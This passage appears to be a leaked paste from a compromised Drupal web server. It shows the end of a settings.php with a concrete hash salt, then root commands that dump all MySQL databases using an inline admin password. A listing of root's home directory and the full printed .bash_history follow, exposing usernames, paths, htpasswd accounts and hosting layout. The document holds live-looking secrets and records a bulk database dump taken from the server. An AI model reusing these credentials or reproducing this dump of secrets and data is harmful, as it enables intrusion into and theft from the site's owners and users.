  801. * $drupal_hash_salt = file_get_contents('/home/example/salt.txt');
  802. *
  803. */
  804. $drupal_hash_salt = 'B8x-QyVDTPGzpuhrABuahW-RLqMRjDPIgOoRxd1Fudw';
  806. /**
  807. * Base URL (optional).
  808. *
  809. * If Drupal is generating incorrect URLs on your site, which could
  810. * be in HTML headers (links to CSS and JS files) or visible links on pages
  811. * (such as in menus), uncomment the Base URL statement below (remove the
  812. * leading hash sign) and fill in the absolute URL to your Drupal installation.
  813. *
  814. * You might also want to force users to use a given domain.
  815. * See the .htaccess file for more information.
  816. *
  817. * Examples:
  818. * $base_url = '';
  819. * $base_url = '';
  820. * $base_url = '';
  821. * $base_url = '';
  822. *
  823. * It is not allowed to have a trailing slash; Drupal will add it
  824. * for you.
  825. */
  826. # $base_url = ''; // NO trailing slash!
  828. /**
  829. * PHP settings:
  830. *
  831. * To see what PHP settings are possible, including whether they can be set at
  832. * runtime (by using ini_set()), read the PHP documentation:
  833. *
  834. * See drupal_initialize_variables() in includes/ for required
  835. * runtime settings and the .htaccess file for non-runtime settings. Settings
  836. * defined there should not be duplicated here so as to avoid conflict issues.
  837. */
  839. /**
  840. * Some distributions of Linux (most notably Debian) ship their PHP
  841. * installations with garbage collection (gc) disabled. Since Drupal depends on
  842. * PHP's garbage collection for clearing sessions, ensure that garbage
  843. * collection occurs by using the most common settings.
  844. */
  845. ini_set('session.gc_probability', 1);
  846. ini_set('session.gc_divisor', 100);
  848. /**
  849. * Set session lifetime (in seconds), i.e. the time from the user's last visit
  850. * to the active session may be deleted by the session garbage collector. When
  851. * a session is deleted, authenticated users are logged out, and the contents
  852. * of the user's $_SESSION variable is discarded.
  853. */
  854. ini_set('session.gc_maxlifetime', 200000);
  856. /**
  857. * Set session cookie lifetime (in seconds), i.e. the time from the session is
  858. * created to the cookie expires, i.e. when the browser is expected to discard
  859. * the cookie. The value 0 means "until the browser is closed".
  860. */
  861. ini_set('session.cookie_lifetime', 0);
  863. /**
  864. * If you encounter a situation where users post a large amount of text, and
  865. * the result is stripped out upon viewing but can still be edited, Drupal's
  866. * output filter may not have sufficient memory to process it. If you
  867. * experience this issue, you may wish to uncomment the following two lines
  868. * and increase the limits of these variables. For more information, see
  869. *
  870. */
  871. # ini_set('pcre.backtrack_limit', 200000);
  872. # ini_set('pcre.recursion_limit', 200000);
  874. /**
  875. * Drupal automatically generates a unique session cookie name for each site
  876. * based on its full domain name. If you have multiple domains pointing at the
  877. * same Drupal site, you can either redirect them all to a single domain (see
  878. * comment in .htaccess), or uncomment the line below and specify their shared
  879. * base domain. Doing so assures that users remain logged in as they cross
  880. * between your various domains.
  881. */
  882. # $cookie_domain = '';
  884. /**
  885. * Variable overrides:
  886. *
  887. * To override specific entries in the 'variable' table for this site,
  888. * set them here. You usually don't need to use this feature. This is
  889. * useful in a configuration file for a vhost or directory, rather than
  890. * the default settings.php. Any configuration setting from the 'variable'
  891. * table can be given a new value. Note that any values you provide in
  892. * these variable overrides will not be modifiable from the Drupal
  893. * administration interface.
  894. *
  895. * The following overrides are examples:
  896. * - site_name: Defines the site's name.
  897. * - theme_default: Defines the default theme for this site.
  898. * - anonymous: Defines the human-readable name of anonymous users.
  899. * Remove the leading hash signs to enable.
  900. */
  901. # $conf['site_name'] = 'My Drupal site';
  902. # $conf['theme_default'] = 'garland';
  903. # $conf['anonymous'] = 'Visitor';
  905. /**
  906. * A custom theme can be set for the offline page. This applies when the site
  907. * is explicitly set to maintenance mode through the administration page or when
  908. * the database is inactive due to an error. It can be set through the
  909. * 'maintenance_theme' key. The template file should also be copied into the
  910. * theme. It is located inside 'modules/system/maintenance-page.tpl.php'.
  911. * Note: This setting does not apply to installation and update pages.
  912. */
  913. # $conf['maintenance_theme'] = 'bartik';
  915. /**
  916. * Enable this setting to determine the correct IP address of the remote
  917. * client by examining information stored in the X-Forwarded-For headers.
  918. * X-Forwarded-For headers are a standard mechanism for identifying client
  919. * systems connecting through a reverse proxy server, such as Squid or
  920. * Pound. Reverse proxy servers are often used to enhance the performance
  921. * of heavily visited sites and may also provide other site caching,
  922. * security or encryption benefits. If this Drupal installation operates
  923. * behind a reverse proxy, this setting should be enabled so that correct
  924. * IP address information is captured in Drupal's session management,
  925. * logging, statistics and access management systems; if you are unsure
  926. * about this setting, do not have a reverse proxy, or Drupal operates in
  927. * a shared hosting environment, this setting should remain commented out.
  928. */
  929. # $conf['reverse_proxy'] = TRUE;
  931. /**
  932. * Set this value if your proxy server sends the client IP in a header other
  933. * than X-Forwarded-For.
  934. *
  935. * The "X-Forwarded-For" header is a comma+space separated list of IP addresses,
  936. * only the last one (the left-most) will be used.
  937. */
  938. # $conf['reverse_proxy_header'] = 'HTTP_X_CLUSTER_CLIENT_IP';
  940. /**
  941. * reverse_proxy accepts an array of IP addresses.
  942. *
  943. * Each element of this array is the IP address of any of your reverse
  944. * proxies. Filling this array Drupal will trust the information stored
  945. * in the X-Forwarded-For headers only if Remote IP address is one of
  946. * these, that is the request reaches the web server from one of your
  947. * reverse proxies. Otherwise, the client could directly connect to
  948. * your web server spoofing the X-Forwarded-For headers.
  949. */
  950. # $conf['reverse_proxy_addresses'] = array('a.b.c.d', ...);
  952. /**
  953. * Page caching:
  954. *
  955. * By default, Drupal sends a "Vary: Cookie" HTTP header for anonymous page
  956. * views. This tells a HTTP proxy that it may return a page from its local
  957. * cache without contacting the web server, if the user sends the same Cookie
  958. * header as the user who originally requested the cached page. Without "Vary:
  959. * Cookie", authenticated users would also be served the anonymous page from
  960. * the cache. If the site has mostly anonymous users except a few known
  961. * editors/administrators, the Vary header can be omitted. This allows for
  962. * better caching in HTTP proxies (including reverse proxies), i.e. even if
  963. * clients send different cookies, they still get content served from the cache.
  964. * However, authenticated users should access the site directly (i.e. not use an
  965. * HTTP proxy, and bypass the reverse proxy if one is used) in order to avoid
  966. * getting cached pages from the proxy.
  967. */
  968. # $conf['omit_vary_cookie'] = TRUE;
  970. /**
  971. * CSS/JS aggregated file gzip compression:
  972. *
  973. * By default, when CSS or JS aggregation and clean URLs are enabled Drupal will
  974. * store a gzip compressed (.gz) copy of the aggregated files. If this file is
  975. * available then rewrite rules in the default .htaccess file will serve these
  976. * files to browsers that accept gzip encoded content. This allows pages to load
  977. * faster for these users and has minimal impact on server load. If you are
  978. * using a webserver other than Apache httpd, or a caching reverse proxy that is
  979. * configured to cache and compress these files itself you may want to uncomment
  980. * one or both of the below lines, which will prevent gzip files being stored.
  981. */
  982. # $conf['css_gzip_compression'] = FALSE;
  983. # $conf['js_gzip_compression'] = FALSE;
  985. /**
  986. * String overrides:
  987. *
  988. * To override specific strings on your site with or without enabling locale
  989. * module, add an entry to this list. This functionality allows you to change
  990. * a small number of your site's default English language interface strings.
  991. *
  992. * Remove the leading hash signs to enable.
  993. */
  994. # $conf['locale_custom_strings_en'][''] = array(
  995. # 'forum' => 'Discussion board',
  996. # '@count min' => '@count minutes',
  997. # );
  999. /**
  1000. *
  1001. * IP blocking:
  1002. *
  1003. * To bypass database queries for denied IP addresses, use this setting.
  1004. * Drupal queries the {blocked_ips} table by default on every page request
  1005. * for both authenticated and anonymous users. This allows the system to
  1006. * block IP addresses from within the administrative interface and before any
  1007. * modules are loaded. However on high traffic websites you may want to avoid
  1008. * this query, allowing you to bypass database access altogether for anonymous
  1009. * users under certain caching configurations.
  1010. *
  1011. * If using this setting, you will need to add back any IP addresses which
  1012. * you may have blocked via the administrative interface. Each element of this
  1013. * array represents a blocked IP address. Uncommenting the array and leaving it
  1014. * empty will have the effect of disabling IP blocking on your site.
  1015. *
  1016. * Remove the leading hash signs to enable.
  1017. */
  1018. # $conf['blocked_ips'] = array(
  1019. # 'a.b.c.d',
  1020. # );
  1022. /**
  1023. * Authorized file system operations:
  1024. *
  1025. * The Update manager module included with Drupal provides a mechanism for
  1026. * site administrators to securely install missing updates for the site
  1027. * directly through the web user interface by providing either SSH or FTP
  1028. * credentials. This allows the site to update the new files as the user who
  1029. * owns all the Drupal files, instead of as the user the webserver is running
  1030. * as. However, some sites might wish to disable this functionality, and only
  1031. * update the code directly via SSH or FTP themselves. This setting completely
  1032. * disables all functionality related to these authorized file operations.
  1033. *
  1034. * Remove the leading hash signs to disable.
  1035. */
  1036. # $conf['allow_authorize_operations'] = FALSE;
  1037. mysqldump -uadmin -pq4TaquHe -aall-databases > onguard.sql &
  1038. cd ~root; ls -al
  1039. total 689460
  1040. drwxr-x--- 5 root root 4096 Jan 23 16:22 .
  1041. drwxr-xr-x 22 root root 4096 Jan 15 21:33 ..
  1042. -rw------- 1 root root 24775 Jan 23 18:08 .bash_history
  1043. -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout
  1044. -rw-r--r-- 1 root root 1595 Feb 3 2011 .bash_mt_profile
  1045. -rw-r--r-- 1 root root 1595 Jul 11 2011 .bash_profile
  1046. -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc
  1047. -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc
  1048. drwxr-xr-x 3 root root 4096 Jul 13 2011 .drush
  1049. -rw------- 1 root root 1235 Dec 6 15:26 .mysql_history
  1050. drwx------ 2 root root 4096 Nov 8 13:27 .ssh
  1051. -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc
  1052. -rw------- 1 root root 9099 Jan 23 16:22 .viminfo
  1053. -rw-r--r-- 1 root root 59301 Nov 8 23:12
  1054. drwxr-xr-x 3 root root 4096 Sep 27 13:32 drush-backups
  1055. -rw-r--r-- 1 root root 705153591 Jan 15 23:59 files.tar.gz
  1056. lrwxrwxrwx 1 root root 34 Sep 19 15:33 ogol -> /var/www/vhosts/
  1057. cat .bash_history
  1058. #1310585037
  1059. ls
  1060. #1310585151
  1061. wget
  1062. #1310585291
  1063. which java
  1064. #1310585294
  1065. java
  1066. #1310585450
  1067. java -version
  1068. #1310585454
  1069. ./
  1070. #1310585618
  1071. wget rpm
  1072. #1310585724
  1073. rpm jdk
  1074. #1310585833
  1075. wget
  1077. 30b4ec7890b6afb805a3e80486f73e1c -O java.bin
  1078. #1310585936
  1079. curl -O java.bin
  1080. #1310585949
  1081. wget -O java.bin
  1082. #1310586142
  1083. ls
  1084. #1310586147
  1085. rm java.bin
  1086. #1310586321
  1087. ls
  1088. #1310586338
  1089. ls
  1090. #1310586347
  1091. mv java.bin
  1092. #1310586348
  1093. ls
  1094. #1310586352
  1095. ./java.bin
  1096. #1310586364
  1097. chmod u+x java.bin
  1098. #1310586368
  1099. ./java.bin
  1100. #1310586389
  1101. ls
  1102. #1310586396
  1103. java -v
  1104. #1310586398
  1105. java
  1106. #1310586420
  1107. ls jdk1.6.0_26/
  1108. #1310586958
  1109. cd jdk1.6.0_26/bin/
  1110. #1310586958
  1111. ls
  1112. #1310587218
  1113. ./java -version
  1114. #1310587222
  1115. ls
  1116. #1310587225
  1117. cd ../../
  1118. #1310587226
  1119. ls
  1120. #1310587235
  1121. rm -rf jdk1.6.0_26/
  1122. #1310587242
  1123. mv java.bin ../
  1124. #1310587243
  1125. ls
  1126. #1310587244
  1127. cd ../
  1128. #1310587245
  1129. ls
  1130. #1310587252
  1131. ./java.bin
  1132. #1310587419
  1133. ls
  1134. #1310587466
  1135. /usr/sbin/alternatives ––install /usr/bin/java java /usr/java/jdk1.6.0_26/bin/java 1
  1136. #1310587531
  1137. alternatives --install /usr/bin/java java /usr/java/jdk1.6.0_26/bin/java 1
  1138. #1310587603
  1139. mkdir usr/java
  1140. #1310587612
  1141. mv jdk1.6.0_26/ usr/java/
  1142. #1310587637
  1143. alternatives --install /usr/bin/java java usr/java/jdk1.6.0_26/bin/java 1
  1144. #1310587689
  1145. alternatives --install /usr/bin/java java /usr/java/jdk1.6.0_26/bin/java 1
  1146. #1310587693
  1147. java -version
  1148. #1310587966
  1149. cd ~
  1150. #1310587967
  1151. pwd
  1152. #1310587970
  1153. ls
  1154. #1310587974
  1155. mv apache-solr-3.3.0-src.tgz ../
  1156. #1310587974
  1157. ls
  1158. #1310587976
  1159. cd /
  1160. #1310587977
  1161. ls
  1162. #1310588128
  1163. tar -xzvf apache-solr-3.3.0-src.tgz
  1164. #1310588159
  1165. ls
  1166. #1310588170
  1167. rm -rf apache-solr-3.3.0/
  1168. #1310588183
  1169. tar -xzvf apache-solr-3.3.0-src.tgz
  1170. #1310588194
  1171. rm apache-solr-3.3.0-src.tgz
  1172. #1310588473
  1173. ls
  1174. #1310588477
  1175. rm -rf apache-solr-3.3.0/
  1176. #1310588514
  1177. wget
  1178. #1310588574
  1179. ls
  1180. #1310588589
  1181. mv apache-solr-1.4.1.tgz usr/
  1182. #1310588590
  1183. ls
  1184. #1310588608
  1185. cd usr/
  1186. #1310588609
  1187. ls
  1188. #1310588616
  1189. mv apache-solr-1.4.1.tgz share/
  1190. #1310588617
  1191. ls
  1192. #1310588631
  1193. cd share/
  1194. #1310588631
  1195. ls
  1196. #1310588636
  1197. mv apache-solr-1.4.1.tgz ../
  1198. #1310588636
  1199. ls
  1200. #1310588639
  1201. cd ../
  1202. #1310588639
  1203. ls
  1204. #1310588653
  1205. tar -xzvf apache-solr-1.4.1.tgz
  1206. #1310588656
  1207. ls
  1208. #1310588667
  1209. mv apache-solr-1.4.1 apache-solr
  1210. #1310588671
  1211. rm apache-solr-1.4.1.tgz
  1212. #1310588674
  1213. cd apache-solr/
  1214. #1310588675
  1215. ls
  1216. #1310588677
  1217. cd example/
  1218. #1310588677
  1219. ls
  1220. #1310588698
  1221. ls
  1222. #1310588746
  1223. java -jar start.jar
  1224. #1310589077
  1225. cd /root/
  1226. #1310589080
  1227. ls
  1228. #1310589132
  1229. mv /usr/apache-solr/ /usr/local/share/
  1230. #1310589138
  1231. cd /usr/local/share/apache-solr/
  1232. #1310589138
  1233. ls
  1234. #1310589142
  1235. cd example/
  1236. #1310589142
  1237. ls
  1238. #1310589156
  1239. cd solr/conf/
  1240. #1310589156
  1241. ls
  1242. #1310589166
  1243. mv schema.xml schema.bak
  1244. #1310589173
  1245. mv solrconfig.xml solrconfig.bak
  1246. #1310589181
  1247. mv /root/solrconfig.xml .
  1248. #1310589187
  1249. mv /root/schema.xml .
  1250. #1310589187
  1251. ls
  1252. #1310589215
  1253. ls
  1254. #1310589217
  1255. cd ../
  1256. #1310589218
  1257. ls
  1258. #1310589219
  1259. cd ../
  1260. #1310589219
  1261. ls
  1262. #1310589224
  1263. cd ../
  1264. #1310589225
  1265. ls
  1266. #1310589229
  1267. cd example/
  1268. #1310589229
  1269. ls
  1270. #1310589237
  1271. java -jar start.jar
  1272. #1310591147
  1273. ls
  1274. #1310591302
  1275. cd /root/
  1276. #1310591303
  1277. ls
  1278. #1310591311
  1279. wget
  1280. #1310591321
  1281. tar -xzvf drush-7.x-4.4.tar.gz
  1282. #1310591322
  1283. ls
  1284. #1310591326
  1285. rm drush-7.x-4.4.tar.gz
  1286. #1310591333
  1287. mv drush/ /usr/local/bin/
  1288. #1310591334
  1289. ls
  1290. #1310591345
  1291. cd /usr/local/bin/
  1292. #1310591346
  1293. ls
  1294. #1310591349
  1295. ls -la
  1296. #1310591361
  1297. cd ../
  1298. #1310591361
  1299. ls
  1300. #1310591381
  1301. ls
  1302. #1310591385
  1303. cd bin/
  1304. #1310591386
  1305. ls
  1306. #1310591393
  1307. mv drush/ /usr/
  1308. #1310591394
  1309. ls
  1310. #1310591408
  1311. cd /usr/
  1312. #1310591409
  1313. ls
  1314. #1310591429
  1315. cd /usr/local/bin/
  1316. #1310591444
  1317. ln -s /usr/drush/drush drush
  1318. #1310591446
  1319. ls
  1320. #1310591449
  1321. ls -la
  1322. #1310591454
  1323. drush -v
  1324. #1310591609
  1325. sudo vim /etc/php.ini
  1326. #1310591633
  1327. drush -v
  1328. #1310591648
  1329. ls
  1330. #1310591651
  1331. exir
  1332. #1310591654
  1333. exit
  1334. #1310591777
  1335. drush dl drush_make
  1336. #1310591780
  1337. ls
  1338. #1310591792
  1339. wget
  1340. #1310591793
  1341. ls
  1342. #1310591801
  1343. tar -xzvf drush_make-6.x-2.2.tar.gz
  1344. #1310591802
  1345. ls
  1346. #1310591806
  1347. rm drush_make-6.x-2.2.tar.gz
  1348. #1310591932
  1349. ls
  1350. #1310591938
  1351. mkdir .drush
  1352. #1310591944
  1353. mv drush_make .drush/
  1354. #1310591948
  1355. drush make -version
  1356. #1310591958
  1357. drush make -v
  1358. #1310592143
  1359. exit
  1360. #1310592294
  1361. cd /usr/local/share/apache-solr/
  1362. #1310592296
  1363. cd example/
  1364. #1310592297
  1365. ls
  1366. #1310592304
  1367. java -jar start.jar
  1368. #1310594284
  1369. cd /usr/local/share/apache-solr/
  1370. #1310594286
  1371. ls
  1372. #1310594296
  1373. java -jar example/start.jar
  1374. #1310594306
  1375. cd example/
  1376. #1310594318
  1377. java -jar start.jar
  1378. #1310602173
  1379. exit
  1380. #1312819920
  1381. ls
  1382. #1312819945
  1383. cd /usr/local/share/apache-solr/example/
  1384. #1312819946
  1385. ls
  1386. #1312819976
  1387. java -jar start.jar
  1388. #1312823127
  1389. ls
  1390. #1312823133
  1391. cd /usr/local/bin/
  1392. #1312823134
  1393. ls
  1394. #1312823145
  1395. vim solr
  1396. #1312823209
  1397. ls /usr/local/share/apache-solr/example/
  1398. #1312823219
  1399. vim solr
  1400. #1312823261
  1401. ls
  1402. #1312823272
  1403. chmod u+x solr
  1404. #1312823295
  1405. solr start
  1406. #1312823354
  1407. ls /etc/init.d/
  1408. #1312823364
  1409. ls
  1410. #1312824709
  1411. ls /etc/rc5.d/
  1412. #1312824715
  1413. ls -la /etc/rc5.d
  1414. #1312824721
  1415. ls -la /etc/rc5.d/
  1416. #1312824746
  1417. cd /etc/rc5.d/
  1418. #1312824747
  1419. ls
  1420. #1312824758
  1421. cd /etc/init.d/
  1422. #1312824759
  1423. ls
  1424. #1312824772
  1425. ln
  1426. #1312824777
  1427. ln --help
  1428. #1312824800
  1429. ln solr /usr/local/bin/solr
  1430. #1312824822
  1431. ln -s /usr/local/bin/solr solr
  1432. #1312824823
  1433. ls
  1434. #1312824825
  1435. ls -la
  1436. #1312824837
  1437. cd ../../
  1438. #1312824847
  1439. cd etc/
  1440. #1312824848
  1441. ls
  1442. #1312824868
  1443. find -n "spam" .
  1444. #1312824880
  1445. find . "spam"
  1446. #1312824912
  1447. find --help
  1448. #1312824948
  1449. find . -name "spam"
  1450. #1312824955
  1451. find . -name "psa"
  1452. #1312825110
  1453. /etc/init.d/solr start
  1454. #1312825267
  1455. vim rc.d/rc.local
  1456. #1314028428
  1457. ls
  1458. #1314029504
  1459. ls /var/www/vhosts/
  1460. #1314029514
  1461. cd /var/www/vhosts/
  1462. #1314029515
  1463. ls
  1464. #1314029837
  1465. ls
  1466. #1314029840
  1467. cd conf/
  1468. #1314029841
  1469. ls
  1470. #1314029846
  1471. vim 13140285020.83350800_httpd.include
  1472. #1314029920
  1473. /etc/init.d/httpd reload
  1474. #1314029964
  1475. exit
  1476. #1316210081
  1477. ls
  1478. #1316210091
  1479. cd /var/www/vhosts/
  1480. #1316210092
  1481. ls
  1482. #1316210095
  1483. cd conf/
  1484. #1316210096
  1485. ls
  1486. #1316210134
  1487. cd ../
  1488. #1316210134
  1489. ls
  1490. #1316210156
  1491. cat conf/13140285020.83350800_httpd.include
  1492. #1316210203
  1493. ls
  1494. #1316210280
  1495. mysql -u dc-ogol_user -p
  1496. #1316211069
  1497. exit
  1498. #1316211162
  1499. cd /var/www/vhosts/
  1500. #1316211164
  1501. ls
  1502. #1316211166
  1503. cd
  1504. #1316211166
  1505. ls
  1506. #1316211209
  1507. cd httpdocs/
  1508. #1316211209
  1509. ls
  1510. #1316211213
  1511. vim .htaccess
  1512. #1316211423
  1513. ls
  1514. #1316211424
  1515. cd ../
  1516. #1316211424
  1517. ls
  1518. #1316211428
  1519. cd private/
  1520. #1316211428
  1521. ls
  1522. #1316211446
  1523. htpasswd -c .htpasswd fhguest
  1524. #1316211480
  1525. chmod 755 .htpasswd
  1526. #1316211505
  1527. pwd
  1528. #1316211523
  1529. vim ../httpdocs/.htaccess
  1530. #1316211607
  1531. vim ../httpdocs/.htaccess
  1532. #1316211630
  1533. ls -la
  1534. #1316211645
  1535. chown dc-ogol-user .htpasswd
  1536. #1316211708
  1537. htpasswd -c .htpasswd fhguest
  1538. #1316211760
  1539. ls
  1540. #1316211768
  1541. ls -la
  1542. #1316211789
  1543. chown dc-ogol-user:psacln .htpasswd
  1544. #1316211816
  1545. vim ../httpdocs/.htaccess
  1546. #1316211954
  1547. mv .htpasswd ../
  1548. #1316211954
  1549. ls
  1550. #1316211958
  1551. cd ../
  1552. #1316211958
  1553. ls
  1554. #1316211961
  1555. ls -la
  1556. #1316211984
  1557. pwd
  1558. #1316212001
  1559. ls
  1560. #1316212003
  1561. cd httpdocs/
  1562. #1316212004
  1563. ls
  1564. #1316212008
  1565. vim .htaccess
  1566. #1316212032
  1567. cd ../
  1568. #1316212033
  1569. pwd
  1570. #1316212048
  1571. vim httpdocs/.htaccess
  1572. #1316212070
  1573. ls
  1574. #1316212073
  1575. cat .htpasswd
  1576. #1316212099
  1577. ls -la
  1578. #1316448880
  1579. ls
  1580. #1316448884
  1581. cd /var/www/vhosts/
  1582. #1316448887
  1583. cd
  1584. #1316448888
  1585. ls
  1586. #1316448893
  1587. cd httpdocs/
  1588. #1316448894
  1589. ls
  1590. #1316448901
  1591. vim .htaccess
  1592. #1316448933
  1593. cd ../
  1594. #1316448934
  1595. ls -la
  1596. #1316449752
  1597. exit
  1598. #1316453096
  1599. ls
  1600. #1316453103
  1601. cd /var/www/vhosts/
  1602. #1316453104
  1603. ls
  1604. #1316453109
  1605. cd
  1606. #1316453109
  1607. ls
  1608. #1316453111
  1609. cd httpdocs/
  1610. #1316453112
  1611. ls
  1612. #1316453118
  1613. cd sites/default/
  1614. #1316453119
  1615. ls
  1616. #1316453121
  1617. cd files/
  1618. #1316453122
  1619. ls -la
  1620. #1316453141
  1621. top
  1622. #1316453156
  1623. cd ../
  1624. #1316453156
  1625. ls
  1626. #1316453169
  1627. chown apache files* -R
  1628. #1316453174
  1629. exit
  1630. #1316454095
  1631. ls
  1632. #1316454104
  1633. cd /var/www/vhosts/
  1634. #1316454104
  1635. ls
  1636. #1316454111
  1637. cd private/
  1638. #1316454112
  1639. ls
  1640. #1316454154
  1641. exit
  1642. #1316460228
  1643. cd /var/www/vhosts/
  1644. #1316460229
  1645. ls
  1646. #1316460231
  1647. cd httpdocs/
  1648. #1316460231
  1649. ls
  1650. #1316460236
  1651. ls
  1652. #1316460441
  1653. vim sites/default/settings.php
  1654. #1316460488
  1655. mysql -u dc-ogol_user
  1656. #1316460491
  1657. mysql -u dc-ogol_user -p
  1658. #1316460688
  1659. cd ~
  1660. #1316460689
  1661. ls
  1662. #1316460703
  1663. wget -O
  1664. #1316460710
  1665. curl -O
  1666. #1316460711
  1667. ls
  1668. #1316460724
  1669. tar -xzvf drush-7.x-4.5.tar.gz
  1670. #1316460725
  1671. ls
  1672. #1316460764
  1673. mv drush /usr/local/share/
  1674. #1316460779
  1675. ln -s /usr/local/share/drush/drush /usr/local/bin/drush
  1676. #1316460806
  1677. ln -s /var/www/vhosts/ ogol
  1678. #1316460807
  1679. ls
  1680. #1316460810
  1681. rm drush-7.x-4.5.tar.gz
  1682. #1316460814
  1683. cd ogol/
  1684. #1316460817
  1685. cd httpdocs/
  1686. #1316460820
  1687. drush cc all
  1688. #1316460930
  1689. exit
  1690. #1316461077
  1691. ls
  1692. #1316461079
  1693. cd ogol/
  1694. #1316461080
  1695. ls
  1696. #1316461081
  1697. cd httpdocs/
  1698. #1316461082
  1699. ls
  1700. #1316461084
  1701. cd flash/
  1702. #1316461085
  1703. ls
  1704. #1316461220
  1705. ping
  1706. #1316461635
  1707. ls
  1708. #1316461637
  1709. cd ../../
  1710. #1316461638
  1711. ls
  1712. #1316461642
  1713. cd conf/
  1714. #1316461642
  1715. ls
  1716. #1316461659
  1717. vim 13140285020.83350800_httpd.include
  1718. #1316461825
  1719. ls -la
  1720. #1316461874
  1721. vim 13160126070.92875200_httpd.include
  1722. #1316461911
  1723. ls -la
  1724. #1316461917
  1725. pwd
  1726. #1316461921
  1727. cd ../
  1728. #1316461922
  1729. ls
  1730. #1316461923
  1731. cd ../
  1732. #1316461925
  1733. ls
  1734. #1316461945
  1735. ls
  1736. #1316461969
  1737. vim /etc/httpd/conf/httpd.conf-182414
  1738. #1316462277
  1739. cd ogol/conf/
  1740. #1316462297
  1741. vim vhost.conf
  1742. #1316462331
  1743. cp vhost.conf vhost_ssl.conf
  1744. #1316462355
  1745. cat /etc/psa/psa.conf
  1746. #1316462371
  1747. grep PRODUCT_ROOT /etc/psa/psa.conf
  1748. #1316462420
  1749. /usr/local/psa/admin/sbin/websrvmng --reconfigure-vhost
  1750. #1316462484
  1751. /usr/local/psa/admin/sbin/websrvmng --reconfigure-vhost
  1752. #1316462509
  1753. ls
  1754. #1316462515
  1755. ls -la
  1756. #1316462537
  1757. cat 13164624840.49954900_httpd.include
  1758. #1316462818
  1759. ls
  1760. #1316462821
  1761. cd ../httpdocs/
  1762. #1316462821
  1763. ls
  1764. #1316462827
  1765. vim .htaccess
  1766. #1316462937
  1767. exit
  1768. #1316528137
  1769. cd /var/www/vhosts/
  1770. #1316528138
  1771. ls
  1772. #1316528140
  1773. cd
  1774. #1316528140
  1775. ls
  1776. #1316528143
  1777. cd httpdocs/
  1778. #1316528143
  1779. ls
  1780. #1316528149
  1781. vim .htaccess
  1782. #1316528357
  1783. vim .htaccess
  1784. #1316529406
  1785. exit
  1786. #1317060413
  1787. cd /var/www/vhosts/
  1788. #1317060413
  1789. ls
  1790. #1317060416
  1791. cd statistics/
  1792. #1317060417
  1793. ls
  1794. #1317060449
  1795. cp logs/access_log ../private/access_log
  1796. #1317060455
  1797. cd ../private/
  1798. #1317060456
  1799. ls
  1800. #1317060457
  1801. ls -la
  1802. #1317060465
  1803. chown ogol-user access_log
  1804. #1317060472
  1805. chown dc-ogol-user access_log
  1806. #1317060474
  1807. ls
  1808. #1317060480
  1809. tail access_log
  1810. #1317060491
  1811. head -n 10 access_log
  1812. #1317060497
  1813. head -n 1 access_log
  1814. #1317060507
  1815. ls -lh access_log
  1816. #1317060522
  1817. ls
  1818. #1317060525
  1819. rm access_log
  1820. #1317060557
  1821. cp ../statistics/logs/access_log.processed.3.gz .
  1822. #1317060558
  1823. ls
  1824. #1317060561
  1825. ls -la
  1826. #1317060566
  1827. cat access_log.processed.3.gz
  1828. #1317060579
  1829. tar -xzvf access_log.processed.3.gz
  1830. #1317060582
  1831. ls
  1832. #1317060654
  1833. gzip --help
  1834. #1317060676
  1835. gzip -d access_log.processed.3.gz
  1836. #1317060679
  1837. ls
  1838. #1317060686
  1839. head access_log.processed.3
  1840. #1317060691
  1841. tail access_log.processed.3
  1842. #1317060696
  1843. ls
  1844. #1317060715
  1845. chown dc-ogol-user access_log.processed.3
  1846. #1317144462
  1847. ls
  1848. #1317144463
  1849. ls -la
  1850. #1317144467
  1851. mkdir .ssh
  1852. #1317144478
  1853. chmod 700 .ssh
  1854. #1317144481
  1855. exit
  1856. #1317144612
  1857. exit
  1858. #1317144801
  1859. ls
  1860. #1317144805
  1861. cd ogol/
  1862. #1317144807
  1863. ls
  1864. #1317144808
  1865. exit
  1866. #1317145677
  1867. cd ogol/
  1868. #1317145678
  1869. ls
  1870. #1317145680
  1871. cd httpdocs/
  1872. #1317145681
  1873. ls
  1874. #1317145695
  1875. vim crossdomain.xml
  1876. #1317146095
  1877. exit
  1878. #1317148099
  1879. cd ogol/
  1880. #1317148099
  1881. ls
  1882. #1317148101
  1883. cd httpdocs/
  1884. #1317148102
  1885. ls
  1886. #1317148108
  1887. cd flash/
  1888. #1317148109
  1889. ls
  1890. #1317148248
  1891. ls
  1892. #1317148249
  1893. cd ../
  1894. #1317148249
  1895. ls
  1896. #1317148252
  1897. mvim .htaccess
  1898. #1317148254
  1899. vim .htaccess
  1900. #1317148383
  1901. ls
  1902. #1317148390
  1903. rm crossdomain.xml
  1904. #1317148395
  1905. cd flash/
  1906. #1317148395
  1907. ls
  1908. #1317148399
  1909. cat crossdomain.xml
  1910. #1317150532
  1911. exit
  1912. #1317220825
  1913. ls
  1914. #1317220827
  1915. cd ogol/
  1916. #1317220827
  1917. ls
  1918. #1317220830
  1919. cd httpdocs/
  1920. #1317220831
  1921. ls
  1922. #1317220835
  1923. cd sites/default/files/
  1924. #1317220836
  1925. ls
  1926. #1317220837
  1927. cd articles/
  1928. #1317220838
  1929. ls
  1930. #1317220839
  1931. cd pdf/
  1932. #1317220840
  1933. ls
  1934. #1317220844
  1935. ls -la
  1936. #1317220896
  1937. ls
  1938. #1317220945
  1939. ls -l
  1940. #1317674877
  1941. cd ogol/
  1942. #1317674877
  1943. ls
  1944. #1317674879
  1945. cd httpdocs/
  1946. #1317674880
  1947. ls
  1948. #1317674882
  1949. ls -la
  1950. #1317674892
  1951. exit
  1952. #1317761144
  1953. ls
  1954. #1317761147
  1955. which make
  1956. #1317761149
  1957. make -v
  1958. #1317761161
  1959. gcc -v
  1960. #1317761184
  1961. automake
  1962. #1317761188
  1963. automake -v
  1964. #1317761195
  1965. which automake
  1966. #1317761201
  1967. ls /usr/bin/
  1968. #1317761231
  1969. ls -la /usr/bin/ | grep automake
  1970. #1317761240
  1971. autoconf
  1972. #1317761245
  1973. autoconf --help
  1974. #1317761253
  1975. autoconf -V
  1976. #1317761314
  1977. automake --hlep
  1978. #1317761321
  1979. automake --help
  1980. #1317761327
  1981. automake --version
  1982. #1317761343
  1983. libtool -V
  1984. #1317761346
  1985. libtool --version
  1986. #1317761356
  1987. ncurses --version
  1988. #1317761466
  1989. which ncurses
  1990. #1317761731
